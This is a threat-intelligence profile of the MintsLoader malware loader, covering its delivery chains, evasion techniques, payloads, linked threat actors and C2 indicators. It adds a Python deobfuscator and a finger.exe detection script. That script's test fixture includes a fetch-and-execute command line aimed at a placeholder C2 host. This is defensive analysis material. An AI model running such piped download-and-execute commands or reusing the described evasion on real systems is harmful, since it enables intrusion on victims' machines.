MintsLoader
MintsLoader is a PowerShell-based, multi-stage malware loader, also tracked as TAG-124, LandUpdate808, and UNC4108 in the reporting collected here. It has been observed since at least February 2023 and became more widespread from mid-2024 onward. It targets Windows endpoints and exists to stage follow-on payloads rather than to provide extensive standalone functionality.
The reported delivery chains include multi-stage JavaScript-to-PowerShell execution, phishing attachments, ClickFix-style social engineering, and compromised-website delivery via SocGholish/FakeUpdates. Observed phishing lures were invoice-themed, including Italian invoice-themed JScript attachments. ClickFix and KongTuke-related lures instructed victims to paste commands into the Windows Run dialog, including abuse of the legitimate Microsoft-signed finger.exe LOLBin to retrieve and execute additional stages. SocGholish has also delivered MintsLoader through fake browser-update overlays on compromised websites.
Reported capabilities include AMSI bypass, arithmetic and hashtable-based string obfuscation, reflective loading of Base64-encoded, Gzip-compressed .NET assemblies, WMI-based anti-sandbox and environment scoring, and multiple domain generation algorithms, including date-seeded DGA logic, to resolve command-and-control infrastructure. The loader withholds its real payloads from sandbox or virtualized environments and may deliver decoy payloads such as AsyncRAT instead. Researchers also reported daily-changing C2 domains and more than 200 DGA domains across multiple clusters.
MintsLoader is primarily associated with delivery of GhostWeaver, a PowerShell RAT, which the reporting describes as tightly integrated with MintsLoader, including cases where MintsLoader profiles targets before GhostWeaver is deployed. Other payloads mentioned include StealC, modified BOINC clients, LockBit, RansomHub, AsyncRAT, NetSupport RAT, and, in some reporting, Broomstick or WarmCookie. Orange Cyberdefense observed SocGholish infections delivering loaders such as MintsLoader that led to GhostWeaver, LockBit, RansomHub, AsyncRAT, and NetSupport RAT.
The reporting links the malware to multiple threat actors and ecosystems. TAG-124/LandUpdate808 is identified as the primary sustained operator. SocGholish/TA569 is described as an early adopter that used MintsLoader as an alternative delivery chain around July 2024. KongTuke is also reported to use MintsLoader alongside other loaders and tooling, and TA582 is described as using MintsLoader to score targets, delivering GhostWeaver to real machines while serving decoys to sandboxes.
Reported targeting includes industrial, legal, and energy organizations in the United States and Europe. High-confidence infrastructure details mentioned directly include active C2 clusters at 178.156.128.182 and 86.107.101.93, and delivery-related domains and hosts observed in ClickFix activity such as humver[.]top, cfcheckver[.]top, and 91.193.19[.]108. Researchers have also shared up-to-date C2 domains and other artifacts from recent MintsLoader attacks.
Groups observed using it
7 distinct threat actors attributed by public researchers.
KongTuke has also been seen using a wider kit, including WinPython, Node.js, finger.exe, a fake NexShield browser extension, the encrypted GateKeeper .NET payload, and loaders like MintsLoader and D3F@ck Loader.
MintsLoader (TAG-124 / LandUpdate808 / UNC4108) Type: Malware Loader - PowerShell-based, multi-stage delivery platform
Another recently observed customer of TA569 is the MintsLoader malware family... UNC4108 utilizes MintsLoader to deploy various payloads...
Before the RAT arrives, a profiler called MintsLoader runs three checks on the target machine... When we submitted the delivery URLs to a sandbox, the server connected but withheld the payload.
Techniques & procedures
20 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
4 techniques
SocGholish is a JavaScript (JS)-based downloader malware that's distributed via compromised websites by masquerading as deceptive updates for web browsers like Google Chrome or Mozilla Firefox, and other popular software.
A typical ClickFix attack begins with threat actors using phishing emails, malvertisements, or compromised websites to lead unsuspecting users to a visual lure... Microsoft Threat Intelligence first observed the use of the ClickFix technique between March and June 2024 in email campaigns sent by a threat actor we track as Storm-1607.
Execution
4 techniques
In each case the victim is ultimately tricked into running an attacker-supplied PowerShell command... Once a command is executed, a multi-stage PowerShell chain downloads and unpacks a portable WinPython environment and launches the ModeloRAT Python scripts.
"Whatever text that server returns is then piped straight into cmd for immediate execution."
ClickFix... fake error or fake CAPTCHA tests to trick users into pasting malicious scripts into the Windows Run dialog... FileFix... manually pasting and executing malicious commands... CrashFix... trick them into manually executing code... In each case the victim is ultimately tricked into running an attacker-supplied PowerShell command.
Privilege Escalation
1 technique
Stealth
7 techniques
Obfuscation uses arithmetic character encoding, where every string is constructed from math expressions without [char] casts: @((8306-8191),(7691-7583),...) -join ''.
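An analyst-side decoder for the arithmetic string encoding described above, added here as an example and not code from the page or from any MintsLoader sample. It assumes each (A-B) or (A+B) term evaluates to a character code point; the sample script line is constructed and hides only the benign string "Get-Date".

```python
import re

# Pattern for the obfuscation form described above: a PowerShell array of
# (A-B) or (A+B) integer expressions followed by -join ''. Assumption for this
# example (not stated on the page): each term evaluates to a character code point.
_ARRAY_RE = re.compile(
    r"@\(\s*((?:\(\s*\d+\s*[-+]\s*\d+\s*\)\s*,?\s*)+)\)\s*-join\s*(?:''|\"\")"
)
_TERM_RE = re.compile(r"\(\s*(\d+)\s*([-+])\s*(\d+)\s*\)")

# Constructed sample script line for this example; it hides the benign string
# "Get-Date" and is not taken from any real sample.
SAMPLE_SCRIPT = (
    "$x = @((8306-8235),(7691-7590),(9000-8884),(1000-955),"
    "(5068-5000),(2097-2000),(6116-6000),(50+51)) -join ''"
)


def decode_arithmetic_array(terms: str) -> str:
    """Evaluate every (A-B)/(A+B) term and map the result to a character."""
    chars = []
    for a, op, b in _TERM_RE.findall(terms):
        value = int(a) - int(b) if op == "-" else int(a) + int(b)
        if not 0 <= value <= 0x10FFFF:
            raise ValueError(f"term does not evaluate to a code point: {value}")
        chars.append(chr(value))
    return "".join(chars)


def deobfuscate_script(script: str) -> list:
    """Return the plaintext hidden in every arithmetic array found in a script."""
    return [decode_arithmetic_array(m.group(1)) for m in _ARRAY_RE.finditer(script)]


def arithmetic_term_count(script: str) -> int:
    """Count (A op B) integer terms; benign scripts rarely contain many of these."""
    return len(_TERM_RE.findall(script))


def looks_obfuscated(script: str, min_terms: int = 8) -> bool:
    """Cheap triage heuristic: flag scripts that build strings from many terms."""
    return arithmetic_term_count(script) >= min_terms


if __name__ == "__main__":
    print(deobfuscate_script(SAMPLE_SCRIPT), looks_obfuscated(SAMPLE_SCRIPT))
```

The term-count heuristic is a triage aid for script-block logs, not a signature; tune min_terms against your own baseline of legitimate PowerShell.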
However, whether the malware is on disk or in memory, we’ve observed its code injected into LOLBins, such as msbuild.exe, regasm.exe, or powershell.exe.
The HTTP response returns a Base64-encoded payload that is then XOR-decoded; once decoded and decompressed, heavily obfuscated PowerShell bypasses AMSI.
These abuse finger.exe - a legitimate Microsoft-signed binary from the obsolete Finger protocol. It remains on modern Windows, is rarely monitored, and can make outbound network connections. The piped output goes directly to cmd for execution.
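Detection logic for the finger.exe pattern described above, run over constructed process-creation events; this is an added example, not code from the page or from any vendor rule. It assumes process events carry a parent image, image, and command line (as Sysmon Event ID 1 or EDR telemetry does), and the sample events, including the host name, are constructed.

```python
from dataclasses import dataclass
from typing import List, Optional

# Shells that launch a pasted Run-dialog command; assumption for this example.
LAUNCHERS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


@dataclass(frozen=True)
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


@dataclass(frozen=True)
class Alert:
    index: int
    severity: str
    reason: str


# Constructed sample events for this example (host name is a placeholder).
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
                 "cmd.exe /c finger user@c2.example.invalid | cmd"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\finger.exe",
                 "finger user@c2.example.invalid"),
    ProcessEvent(r"C:\Program Files\LegacyTool\legacy.exe",
                 r"C:\Windows\System32\finger.exe", "finger admin@host.example.invalid"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
                 "notepad.exe notes.txt"),
    ProcessEvent(r"C:\Windows\System32\services.exe",
                 r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
]


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(index: int, ev: ProcessEvent) -> Optional[Alert]:
    image, parent = _basename(ev.image), _basename(ev.parent_image)
    cmdline = ev.command_line.lower()
    # A shell whose own command line runs finger and pipes the output onward is
    # the "piped straight into cmd" pattern the section describes.
    if image in LAUNCHERS and "finger" in cmdline and "|" in cmdline:
        return Alert(index, "high", "shell pipes finger.exe output into an interpreter")
    # finger.exe is almost never run legitimately on modern endpoints, so any
    # execution is worth a look; a shell parent raises the severity.
    if image == "finger.exe":
        return Alert(index, "high" if parent in LAUNCHERS else "medium",
                     f"finger.exe executed (parent {parent})")
    return None


def scan(events: List[ProcessEvent]) -> List[Alert]:
    return [a for a in (classify(i, ev) for i, ev in enumerate(events)) if a]
```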
"including sandbox detection, virtual machine detection" / "Checks for virtual machine/sandbox environments using obscure logic and system metadata"
Step 3 - Evasion: WMI Environment Scoring. Three WMI checks produce a cumulative score that determines whether the C2 serves the real payload or a decoy.
"...executed it in memory..."; "...keeping the entire chain in memory..."; "...runs the returned PowerShell directly in memory." | "A base64-encoded, Gzip-compressed .NET assembly was unpacked in memory and invoked via reflection."; "...loads... using System.Reflection.Assembly::Load ... identifies its Main method and invokes it via reflection..."
Discovery
2 techniques
Command and Control
4 techniques
Once active, SocGholish connects to its C2 infrastructure and deploys a variety of second-stage payloads.
"...PHP based staging via a 1.php?s=<GUID> endpoint..."; "...request to the /st2 path..."
IOCs tracked for this family
72 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
Recent activity
34 sources tracked across advisories, community write-ups, and news.
A loader used in the broader KongTuke/Woodgnat toolset as part of flexible malware delivery methods.
A malware loader used by KongTuke to deliver additional payloads.
A commodity loader used to stage follow-on payloads in Woodgnat-linked attack chains.
A commodity loader used in Woodgnat attack chains to stage follow-on payloads.